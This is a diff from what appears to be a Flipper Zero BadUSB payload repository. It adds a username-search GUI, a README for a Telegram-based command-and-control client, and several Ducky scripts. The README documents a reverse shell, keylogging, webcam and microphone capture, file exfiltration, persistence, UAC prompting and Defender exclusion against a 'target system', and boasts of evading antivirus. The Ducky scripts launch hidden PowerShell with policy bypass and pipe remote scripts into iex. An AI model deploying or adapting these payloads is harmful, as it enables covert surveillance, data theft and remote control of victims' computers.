+[System.Windows.Forms.Application]::EnableVisualStyles()
+
+$MainWindow = New-Object System.Windows.Forms.Form
+$MainWindow.ClientSize = '690,700'
+$MainWindow.Text = "| Beigetools | Social Search |"
+$MainWindow.BackColor = "#242424"
+$MainWindow.Opacity = 1
+$MainWindow.TopMost = $true
+$MainWindow.Icon = [System.Drawing.Icon]::ExtractAssociatedIcon("C:\Windows\System32\charmap.exe")
+
+$TextInput = New-Object System.Windows.Forms.TextBox
+$TextInput.Location = New-Object System.Drawing.Point(20, 40)
+$TextInput.BackColor = "#eeeeee"
+$TextInput.Width = 370
+$TextInput.Height = 40
+$TextInput.Font = 'Microsoft Sans Serif,12,style=Bold'
+$TextInput.add_MouseHover($showhelp)
+$TextInput.name="input"
+
+$TextInputHeader = New-Object System.Windows.Forms.Label
+$TextInputHeader.Text = "Username"
+$TextInputHeader.ForeColor = "#bcbcbc"
+$TextInputHeader.AutoSize = $true
+$TextInputHeader.Width = 25
+$TextInputHeader.Height = 10
+$TextInputHeader.Location = New-Object System.Drawing.Point(20, 20)
+$TextInputHeader.Font = 'Microsoft Sans Serif,10,style=Bold'
+
+$OutputBoxHeader = New-Object System.Windows.Forms.Label
+$OutputBoxHeader.Text = "Results"
+$OutputBoxHeader.ForeColor = "#bcbcbc"
+$OutputBoxHeader.AutoSize = $true
+$OutputBoxHeader.Width = 25
+$OutputBoxHeader.Height = 10
+$OutputBoxHeader.Location = New-Object System.Drawing.Point(20, 90)
+$OutputBoxHeader.Font = 'Microsoft Sans Serif,10,style=Bold'
+
+$OutputBox = New-Object System.Windows.Forms.TextBox
+$OutputBox.Multiline = $True;
+$OutputBox.Location = New-Object System.Drawing.Size(20,110)
+$OutputBox.Width = 650
+$OutputBox.Height = 570
+$OutputBox.Scrollbars = "Vertical"
+$OutputBox.Font = 'Microsoft Sans Serif,12,style=Bold'
+
+$DecodeBT = New-Object System.Windows.Forms.Button
+$DecodeBT.Text = "Start Search"
+$DecodeBT.Width = 150
+$DecodeBT.Height = 35
+$DecodeBT.Location = New-Object System.Drawing.Point(520, 30)
+$DecodeBT.Font = 'Microsoft Sans Serif,10,style=Bold'
+$DecodeBT.BackColor = "#eeeeee"
+$DecodeBT.add_MouseHover($showhelp)
+$DecodeBT.name="decode"
+
+$MainWindow.controls.AddRange(@($TextInput,$DecodeBT,$OutputBox,$TextInputHeader,$OutputBoxHeader))
+
+
+$DecodeBT.Add_Click({
+
+Function Add-OutputBoxLine{
+ Param ($outfeed)
+ $OutputBox.AppendText("`r`n$outfeed")
+ $OutputBox.Refresh()
+ $OutputBox.ScrollToCaret()
+}
+
+
+$myArray = @(
+"https://twitter.com/$userhandle",
+"https://www.instagram.com/$userhandle/",
+"https://ws2.kik.com/user/$userhandle/",
+"https://medium.com/@$userhandle",
+"https://pastebin.com/u/$userhandle/",
+"https://www.patreon.com/$userhandle/",
+"https://photobucket.com/user/$userhandle/library",
+"https://www.pinterest.com/$userhandle/",
+"https://myspace.com/$userhandle/",
+"https://www.reddit.com/user/$userhandle/"
+"https://2Dimensions.com/a/$userhandle"
+"https://www.7cups.com/@$userhandle"
+"https://www.9gag.com/u/$userhandle"
+"https://about.me/$userhandle"
+"https://independent.academia.edu/$userhandle"
+"https://www.alik.cz/u/$userhandle"
+"https://www.alltrails.com/members/$userhandle"
+"https://www.anobii.com/$userhandle/profile"
+"https://discussions.apple.com/profile/$userhandle"
+"https://archive.org/details/@$userhandle"
+"https://asciinema.org/~$userhandle"
+"https://ask.fm/$userhandle"
+"https://discuss.atom.io/u/$userhandle/summary"
+"https://audiojungle.net/user/$userhandle"
+"https://www.avizo.cz/$userhandle/"
+"https://blip.fm/$userhandle"
+"https://$userhandle.booth.pm/"
+"https://www.behance.net/$userhandle"
+"https://binarysearch.io/@/$userhandle"
+"https://bitbucket.org/$userhandle/"
+"https://$userhandle.blogspot.com"
+"https://bodyspace.bodybuilding.com/$userhandle"
+"https://www.bookcrossing.com/mybookshelf/$userhandle/"
+"https://buzzfeed.com/$userhandle"
+"https://www.cnet.com/profiles/$userhandle/"
+"https://$userhandle.carbonmade.com"
+"https://career.habr.com/$userhandle"
+"https://beta.cent.co/@$userhandle"
+"https://www.championat.com/user/$userhandle"
+"https://www.chess.com/member/$userhandle"
+"https://www.cloob.com/name/$userhandle"
+"https://community.cloudflare.com/u/$userhandle"
+"https://www.codecademy.com/profiles/$userhandle"
+"https://www.codechef.com/users/$userhandle"
+"https://www.codewars.com/users/$userhandle"
+"https://www.colourlovers.com/lover/$userhandle"
+"https://www.coroflot.com/$userhandle"
+"https://www.countable.us/$userhandle"
+"https://www.cracked.com/members/$userhandle/"
+"https://$userhandle.crevado.com"
+"https://dev.to/$userhandleali"
+"https://www.dailymotion.com/$userhandle"
+"https://www.designspiration.net/$userhandle/"
+"https://$userhandle.deviantart.com"
+"https://www.discogs.com/user/$userhandle"
+"https://discuss.elastic.co/u/$userhandle"
+"https://disqus.com/$userhandle"
+"https://dribbble.com/$userhandle"
+"https://www.duolingo.com/profile/$userhandle"
+"https://ello.co/$userhandle"
+"https://euw.op.gg/summoner/userName=$userhandle"
+"https://www.eyeem.com/u/$userhandle"
+"https://f3.cool/$userhandle/"
+"https://www.facebook.com/$userhandle"
+"https://facenama.com/$userhandle"
+"https://www.flickr.com/people/$userhandle"
+"https://flipboard.com/@$userhandle"
+"https://fortnitetracker.com/profile/all/$userhandle"
+"https://freelance.habr.com/freelancers/$userhandle"
+"https://www.freelancer.com/api/users/0.1/users?usernames%5B%5D=$userhandle&compact=true"
+"https://freesound.org/people/$userhandle/"
+"https://www.gamespot.com/profile/$userhandle/"
+"https://giphy.com/$userhandle"
+"https://www.github.com/$userhandle"
+"https://gitlab.com/$userhandle"
+"https://gitee.com/$userhandle"
+"http://en.gravatar.com/$userhandle"
+"https://www.gumroad.com/$userhandle"
+"https://gurushots.com/$userhandle/photos"
+"https://hackaday.io/$userhandle"
+"https://news.ycombinator.com/user?id=$userhandle"
+"https://hackerone.com/$userhandle"
+"https://hackerrank.com/$userhandle"
+"https://www.house-mixes.com/profile/$userhandle"
+"https://icq.im/$userhandle"
+"https://www.ifttt.com/p/$userhandle"
+"https://www.instructables.com/member/$userhandle"
+"https://$userhandle.itch.io/"
+"https://$userhandle.jimdosite.com"
+"https://forums.kali.org/member.php?username=$userhandle"
+"https://keybase.io/$userhandle"
+"https://kik.me/$userhandle"
+"https://www.linux.org.ru/people/$userhandle/profile"
+"https://launchpad.net/~$userhandle"
+"https://leetcode.com/$userhandle"
+"https://letterboxd.com/$userhandle"
+"https://lichess.org/@/$userhandle"
+"https://$userhandle.livejournal.com"
+"https://www.liveleak.com/c/$userhandle"
+"https://lolchess.gg/profile/na/$userhandle"
+"https://www.memrise.com/user/$userhandle/"
+"https://www.mixcloud.com/$userhandle/"
+"https://www.munzee.com/m/$userhandle"
+"https://myanimelist.net/profile/$userhandle"
+"https://www.myminifactory.com/users/$userhandle"
+"https://myspace.com/$userhandle"
+"https://www.native-instruments.com/forum/members?username=$userhandle"
+"https://namemc.com/profile/$userhandle"
+"https://blog.naver.com/$userhandle"
+"https://$userhandle.newgrounds.com"
+"https://notabug.org/$userhandle"
+"https://www.openstreetmap.org/user/$userhandle"
+"https://opensource.com/users/$userhandle"
+"https://forums.pcgamer.com/members/?username=$userhandle"
+"https://packagist.org/packages/$userhandle/"
+"https://pastebin.com/u/$userhandle"
+"https://www.patreon.com/$userhandle"
+"https://www.periscope.tv/$userhandle/"
+"https://www.pinkbike.com/u/$userhandle/"
+"https://www.pinterest.com/$userhandle/"
+"https://plug.dj/@/$userhandle"
+"https://polarsteps.com/$userhandle"
+"https://www.producthunt.com/@$userhandle"
+"http://promodj.com/$userhandle"
+"https://pypi.org/user/$userhandle"
+"https://quizlet.com/$userhandle"
+"https://raidforums.com/User-$userhandle"
+"https://www.reddit.com/user/$userhandle"
+"https://repl.it/@$userhandle"
+"https://www.reverbnation.com/$userhandle"
+"https://rubygems.org/profiles/$userhandle"
+"https://www.scribd.com/$userhandle"
+"https://$userhandle.slack.com"
+"https://slashdot.org/~$userhandle"
+"https://slideshare.net/$userhandle"
+"https://soundcloud.com/$userhandle"
+"https://sourceforge.net/u/$userhandle"
+"https://www.sparkpeople.com/mypage.asp?id=$userhandle"
+"https://speedrun.com/user/$userhandle"
+"https://www.sporcle.com/user/$userhandle/people"
+"https://open.spotify.com/user/$userhandle"
+"https://robertsspaceindustries.com/citizens/$userhandle"
+"https://steamcommunity.com/id/$userhandle"
+"https://steamcommunity.com/groups/$userhandle"
+"https://steamid.uk/profile/$userhandle"
+"https://www.strava.com/athletes/$userhandle"
+"https://forum.sublimetext.com/u/$userhandle"
+"https://ch.tetr.io/u/$userhandle"
+"https://tellonym.me/$userhandle"
+"https://tiktok.com/@$userhandle"
+"https://www.gotinder.com/@$userhandle"
+"http://en.tm-ladder.com/$userhandle_rech.php"
+"https://www.tradingview.com/u/$userhandle/"
+"https://trello.com/$userhandle"
+"https://tripadvisor.com/members/$userhandle"
+"https://tryhackme.com/p/$userhandle"
+"https://www.twitch.tv/$userhandle"
+"https://ultimate-guitar.com/u/$userhandle"
+"https://unsplash.com/@$userhandle"
+"https://vsco.co/$userhandle"
+"https://forum.velomania.ru/member.php?username=$userhandle"
+"https://vero.co/$userhandle"
+"https://vimeo.com/$userhandle"
+"https://virgool.io/@$userhandle"
+"https://www.virustotal.com/ui/users/$userhandle/trusted_users"
+"https://www.warriorforum.com/members/$userhandle.html"
+"https://weheartit.com/$userhandle"
+"https://$userhandle.webnode.cz/"
+"http://www.wikidot.com/user:info/$userhandle"
+"https://www.wikipedia.org/wiki/User:$userhandle"
+"https://community.windy.com/user/$userhandle"
+"https://profiles.wordpress.org/$userhandle/"
+"https://xboxgamertag.com/search/$userhandle"
+"https://www.younow.com/$userhandle/"
+"https://youpic.com/photographer/$userhandle/"
+"https://www.youtube.com/$userhandle"
+"https://www.zhihu.com/people/$userhandle"
+"https://akniga.org/profile/$userhandle"
+"https://allmylinks.com/$userhandle"
+"https://aminoapps.com/u/$userhandle"
+"http://www.authorstream.com/$userhandle/"
+"https://www.couchsurfing.com/people/$userhandle"
+"https://www.geocaching.com/p/default.aspx?u=$userhandle"
+"https://gfycat.com/@$userhandle"
+"https://www.hackster.io/$userhandle"
+"https://www.interpals.net/$userhandle"
+"http://www.jeuxvideo.com/profil/$userhandle?mode=infos"
+"https://last.fm/user/$userhandle"
+"https://forum.leasehackr.com/u/$userhandle/summary/"
+"https://www.livelib.ru/reader/$userhandle"
+"https://mastodon.cloud/@$userhandle"
+"https://mastodon.social/@$userhandle"
+"https://mastodon.technology/@$userhandle"
+"https://mastodon.xyz/@$userhandle"
+"https://www.mercadolivre.com.br/perfil/$userhandle"
+"https://www.metacritic.com/user/$userhandle"
+"https://mstdn.io/@$userhandle"
+"https://www.nairaland.com/$userhandle"
+"https://note.com/$userhandle"
+"https://www.npmjs.com/~$userhandle"
+"https://osu.ppy.sh/users/$userhandle"
+"https://php.ru/forum/members/?username=$userhandle"
+"https://pr0gramm.com/user/$userhandle"
+"https://social.tchncs.de/@$userhandle"
+"http://uid.me/$userhandle"
+)
+
+$userhandle = $TextInput.Text
+Add-OutputBoxLine -outfeed "------------------------------------------------------------------------------"
+Add-OutputBoxLine -outfeed "Searching Username:$userhandle Against Known Websites List..."
+Add-OutputBoxLine -outfeed "------------------------------------------------------------------------------"
+
+foreach ($i in $myArray) {
+try{
+ $response = Inv`o`ke-`W`ebR`e`qu`e`st -Uri "$i" -ErrorAction Stop
+ $StatusCode = $Response.StatusCode
+}catch{$StatusCode = $_.Exception.Response.StatusCode.value__}
+if ($StatusCode -eq "200"){
+ Add-OutputBoxLine -outfeed "Found one: $i$userhandle"
+}if ($StatusCode -eq "404"){}else {}}
+
+})
+
+
+
+$MainWindow.ShowDialog() | Out-Null
+exit
\ No newline at end of file
diff --git a/Telegram-C2/README.md b/Telegram-C2/README.md
new file mode 100644
index 0000000..9e65ce3
--- /dev/null
+++ b/Telegram-C2/README.md
@@ -0,0 +1,151 @@
+# Beigeworm's Telegram C2 Client
+
+MAIN SCRIPT HERE - https://github.com/beigeworm/PoshGram-C2
+
+**SYNOPSIS**
+-------------
+
+Using a Telegram Bot's Chat to Act as a Command and Control Server.
+
+Telegram Bots are able to both receive AND send messages. so can you use it as a C2 Server?
+
+-----------------------------------------------------------------------------------------------------------------------------
+
+**INFORMATION**
+---------------
+
+This script will wait until it is called in the Telegram chat by it's host computer name (eg. DESKTOP-WG65HY). Then Click 'Enter Commands' or 'Options' to begin the session and accept commands from Telegram chat.
+
+During a connected session, A list of Modules can be accessed by typing 'options' in chat. Or you can use the chat to act simply as a reverse shell with standard PowerShell commands.
+
+-----------------------------------------------------------------------------------------------------------------------------
+
+Confirmed working with no Microsoft AV detections, on a variety of Windows systems over a week or so of testing 14/08/23
+
+*(Win 10 Laptop, Win 11 Laptop, 2 Win 11 Desktops, 2 Win10 Desktops, Win 10 VM, AtlasOS Win 10 Laptop. ReviOS Win 10 Macbook w/ Bootcamp) will add more in future...*
+
+-----------------------------------------------------------------------------------------------------------------------------
+
+**FEATURES**
+-------------
+
+**Session Queue** - While running, this script waits for a start phrase (the computer name) before connecting, allowing multiple computers to wait for interaction.
+
+**Botnet Mode** - Add simultaneous sessions to control multiple computers at once. (enter computer names one after the other into chat)
+
+**Persistance** - Can add itself to startup folder (RemovePersistance command will undo this)
+
+**Auto Update** - The script checks for a newer version and updates if neccecary.
+
+**Options List** - Once connected type "Options" to see a list of operations. ("ExtraInfo" will show more command info)
+
+**Pause Session** - exits the current session and script waits for re-authrentication.
+
+**Key Capture Standby** - only sends messages if keys are pressed and remains idle otherwise.
+
+**File Size Intellegence** - Auto split Uploads over 50mb.
+
+**Privilege Escalation** - The ability to send the user a UAC prompt for this script and restart if succesful.
+
+**Toggle Error Messaging** - Turn On or Off returning error messages to the chat. (Off by default)
+
+**Reverse shell** - apart from running the modules, once connected the chat can act as a reverse shell.
+
+**Killswitch** - Any Modules such as "KeyCapture" and "Exfiltrate" can be killed by typing "KILL" into chat
+ (this returns the session so it can accept further commands (does not kill the current session.))
+
+-----------------------------------------------------------------------------------------------------------------------------
+
+**TELEGRAM SETUP INSTRUCTIONS**
+----------------------
+ 1. Install Telegram and make an account if you haven't already.
+
+ 2. Visit https://t.me/botfather and make a bot. (make a note of the API token)
+
+ 3. Click the provided link to open the chat E.G. "t.me/****bot" then type or click /start)
+
+ 4. At the start off the the Script - Replace `$tg` with your Telegram Bot API Token (only when running ps1 directly (not changed using Flipper, VBScript etc as it should be pre-defined there.. eg. `$tg = 'TOKEN'`))
+
+ 5. Run the script on target system
+
+ 6. Check telegram chat for 'waiting to connect' message.
+
+ 7. This script has a feature to wait until you start the session from Telegram.
+
+ 8. Type the computer name from the 'waiting' message into Telegram bot chat to connect to that computer's session.
+
+-----------------------------------------------------------------------------------------------------------------------------
+
+**MODULES INFORMATION**
+-----------------------
+
+`Options` : Show a menu in chat listing all the below functions
+
+`Kill` : Killswitch for `Key-Capture` and `Exfiltrate` commands (can take a few seconds to kill.)
+
+`Extra-Info` : Extra command information and examples sent to the chat
+
+`Close` : Close the Session completely
+
+`Pause-Session` : Pauses the session (to reconnect type in the computer name again)
+
+`Toggle-Errors` : Toggle error messages to the chat ON or OFF and returns the current state to chat
+
+`Folder-Tree` : Gets Directory trees for User folders and sends it zipped to the chat
+
+`SpeechToText` : Send audio transcript to Discord
+
+`Screenshot` : Sends a screenshot of the desktop as a png file
+
+`Key-capture` : Capture Keystrokes and send them (collected keystrokes are only sent after 10 seconds of keyboard inactivity)
+
+`System-info` : Send System info as text file (system, user, hardware, ip information and more)
+
+`Enumerate-LAN` : find info on other network devices (IPv4, MAC address, Hostname, Manufacturer) (eg. `Enumerate-LAN -prefix 192.168.1`)
+
+`Add-Persistance` : Add Telegram C2 to Startup (Copy the script to a default windows location and a vbs script to the startup folder)
+
+`Remove-Persistance` : Remove Startup Persistance (Remove the ps1 script and vbs file)
+
+`Is-Admin` : Checks if session has admin Privileges and returns the result
+
+`Attempt-Elevate` : Send user a prompt to grant Administrator privilages in a new session. (if the user accepts the prompt)
+
+`Message` : Send a message in a pop-up window to connected computer `Message "Your Message Here!"`
+
+`Take-Picture` : Take a picture with any connected camera/webcam and upload to chat.
+
+`Record-Audio` : Record microphone to mp3 file and upload to chat. eg. `Record-Audio -t 100` in seconds
+
+`Record-Screen` : Record Screen to mkv file and upload to chat. eg. `Record-Screen -t 100` in seconds
+
+`Nearby-Wifi` : Show nearby wifi networks
+
+`Send-Hydra` : Never ending popups (use killswitch)
+
+`Exfiltrate` : Searches for, and sends, files to the chat as zip files split into 50mb each (Telegram max upload limit.)
+
+ EXFILTRATION EXAMPLE COMMAND = `Exfiltrate -path [FOLDERS] -filetype [FILETYPES]`
+
+ FOLDERS = Documents, Desktop, Downloads, OneDrive, Pictures, Videos
+
+ FILETYPES = log, db, txt, doc, pdf, jpg, jpeg, png, wdoc, xdoc, cer, key, xls, xlsx, cfg, conf, docx, rft
+
+**ADMIN ONLY FUNCTIONS**
+
+`Disable-AV` : Attempt to exclude C:/ from Defender Scanning (Crude disable method)
+
+`Disable-HID` : Disable Mice and Keyboards on the target system
+
+`Enable-HID` : Enable Mice and Keyboards on the target system
+
+*(Commands are not case sensitive)*
+
+-----------------------------------------------------------------------------------------------------------------------------
+
+Builder GUI example
+
+
+Telegram Chat example
+
+o 'kill' to stop 'KeyCapture' or 'Exfiltrate' command and return to waiting for commands.
\ No newline at end of file
diff --git a/Telegram-C2/Telegram C2 Client.txt b/Telegram-C2/Telegram C2 Client.txt
new file mode 100644
index 0000000..bc7fb34
--- /dev/null
+++ b/Telegram-C2/Telegram C2 Client.txt
@@ -0,0 +1,27 @@
+
+REM Title: beigeworm's Telegram Command And Control.
+REM Author: @beigeworm
+REM Description: Using a Telegram Bot's Chat to Act as a Command and Control Platform.
+REM Target: Windows 10 and 11
+
+REM SETUP INSTRUCTIONS
+REM 1. visit https://t.me/botfather and make a bot.
+REM 2. add bot api to script.
+REM 3. search for bot in top left box in telegram and start a chat then type /start.
+REM 5. Run Script on target System
+REM 6. Check telegram chat for 'waiting to connect' message.
+REM 7. this script has a feature to wait until you start the session from telegram.
+REM 8. type in the computer name from that message into telegram bot chat to connect to that computer.
+REM 9. Replace TELEGRAM_BOT_API_TOKEN_HERE Below with your Telegram Bot API Token
+
+REM some setup for dukie script
+DEFAULT_DELAY 100
+
+REM open powershell (remove "-W H" to show the window)
+DELAY 1000
+GUI r
+DELAY 750
+STRING powershell -NonI -NoP -Ep Bypass -C $tg='TELEGRAM_BOT_API_TOKEN_HERE'; irm https://raw.githubusercontent.com/beigeworm/PoshGram-C2/main/Telegram-C2-Client.ps1 | iex
+ENTER
+
+
diff --git a/Telegram-Infostealer/README.md b/Telegram-Infostealer/README.md
new file mode 100644
index 0000000..5056d54
--- /dev/null
+++ b/Telegram-Infostealer/README.md
@@ -0,0 +1,14 @@
+
+
+
+SYNOPSIS
+
+This script changes the keyboard layout and system language to US.
+
+USAGE
+
+1. Run the script on a target system
\ No newline at end of file
diff --git a/US-Keyboard-Layout/US-Keyboard.txt b/US-Keyboard-Layout/US-Keyboard.txt
new file mode 100644
index 0000000..9479f31
--- /dev/null
+++ b/US-Keyboard-Layout/US-Keyboard.txt
@@ -0,0 +1,17 @@
+REM Title: beigeworm's Keyboard Language changer.
+REM Author: @beigeworm
+REM Description: This script changes the keyboard layout and system language to US.
+REM Target: Windows 10
+
+REM some setup for dukie script
+DEFAULT_DELAY 100
+
+REM open powershell (remove "-W H" to show the window)
+DELAY 1000
+GUI r
+DELAY 750
+STRING powershell -NoP -Ep Bypass -W H -C irm https://raw.githubusercontent.com/beigeworm/BadUSB-Files-For-FlipperZero/main/US-Keyboard-Layout/main.ps1 | iex
+ENTER
+
+
+
diff --git a/US-Keyboard-Layout/main.ps1 b/US-Keyboard-Layout/main.ps1
new file mode 100644
index 0000000..88e777a
--- /dev/null
+++ b/US-Keyboard-Layout/main.ps1
@@ -0,0 +1,9 @@
+Function SetkbUS {
+
+Dism /online /Get-Intl
+Set-WinSystemLocale en-US
+Set-WinUserLanguageList en-US -force
+
+}
+
+SetkbUS
diff --git a/Wallpaper-Jumpscare/README.md b/Wallpaper-Jumpscare/README.md
new file mode 100644
index 0000000..0f433d5
--- /dev/null
+++ b/Wallpaper-Jumpscare/README.md
@@ -0,0 +1,11 @@
+
+
Simple Wallpaper Changer
+
+SYNOPSIS
+
+This script will download an image from the web and set it as the wallpaper.
+
+USAGE
+
+1. Change DIRECT IMAGE LINK HERE to your URL.
+2. Run the script.
diff --git a/Wallpaper-Jumpscare/Wallpaper-Jumpscare.txt b/Wallpaper-Jumpscare/Wallpaper-Jumpscare.txt
new file mode 100644
index 0000000..4df4aaa
--- /dev/null
+++ b/Wallpaper-Jumpscare/Wallpaper-Jumpscare.txt
@@ -0,0 +1,18 @@
+REM Title: beigeworm's Wallpaper Jump Scare.
+REM Author: @beigeworm
+REM Description: This script changes downlaods a scary image and sets it as a wallpaper.
+REM Target: Windows 10
+
+REM some setup for dukie script
+DEFAULT_DELAY 100
+
+REM open powershell (remove "-W H" to show the window)
+DELAY 1000
+GUI r
+DELAY 750
+STRING powershell -NoP -Ep Bypass -W H -C irm https://raw.githubusercontent.com/beigeworm/BadUSB-Files-For-FlipperZero/main/Wallpaper-Jumpscare/main.ps1
+ | iex
+CTRL-SHIFT ENTER
+DELAY 3000
+ALT y
+
diff --git a/Wallpaper-Jumpscare/main.ps1 b/Wallpaper-Jumpscare/main.ps1
new file mode 100644
index 0000000..c0126e2
--- /dev/null
+++ b/Wallpaper-Jumpscare/main.ps1
@@ -0,0 +1,23 @@
+$url = "https://i.ibb.co/XJSPt9s/1.png"
+$outputPath = "$env:temp\img.jpg"
+$wallpaperStyle = 2 # 0: Tiled, 1: Centered, 2: Stretched
+
+IWR -Uri $url -OutFile $outputPath
+
+$signature = @'
+using System;
+using System.Runtime.InteropServices;
+
+public class Wallpaper {
+ [DllImport("user32.dll", CharSet = CharSet.Auto)]
+ public static extern int SystemParametersInfo(int uAction, int uParam, string lpvParam, int fuWinIni);
+}
+'@
+
+Add-Type -TypeDefinition $signature
+
+$SPI_SETDESKWALLPAPER = 0x0014
+$SPIF_UPDATEINIFILE = 0x01
+$SPIF_SENDCHANGE = 0x02
+
+[Wallpaper]::SystemParametersInfo($SPI_SETDESKWALLPAPER, 0, $outputPath, $SPIF_UPDATEINIFILE -bor $SPIF_SENDCHANGE)
diff --git a/Webhook-Spammer-GUI/README.md b/Webhook-Spammer-GUI/README.md
new file mode 100644
index 0000000..9ed763b
--- /dev/null
+++ b/Webhook-Spammer-GUI/README.md
@@ -0,0 +1,12 @@
+
+